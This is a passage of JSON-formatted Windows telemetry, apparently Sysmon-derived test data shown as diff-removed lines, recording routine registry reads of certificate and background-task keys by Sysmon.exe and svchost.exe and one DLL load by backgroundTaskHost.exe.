"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_value": "{894f95b7-467e-4aba-b832-df7be656ba28}", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\BrokerId", - "registry_value": "BrokerId", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventParameters", - "registry_value": "EventParameters", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": 
"\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\PackageFullName", - "registry_value": "PackageFullName", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\UserSid", - "registry_value": "UserSid", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_value": 
"{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ActivationType", - "registry_value": "ActivationType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Conditions", - "registry_value": "Conditions", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - 
"registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Name", - "registry_value": "Name", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TriggerEvent", - "registry_value": "TriggerEvent", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TaskEntryPoint", - "registry_value": "TaskEntryPoint", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageRelativeAppName", - "registry_value": "PackageRelativeAppName", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PsmActivationType", - "registry_value": "PsmActivationType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageFlags", - "registry_value": "PackageFlags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ExtendedRegistrationData", - "registry_value": "ExtendedRegistrationData", - "timestamp": 131883571691990000, - "unique_pid": 
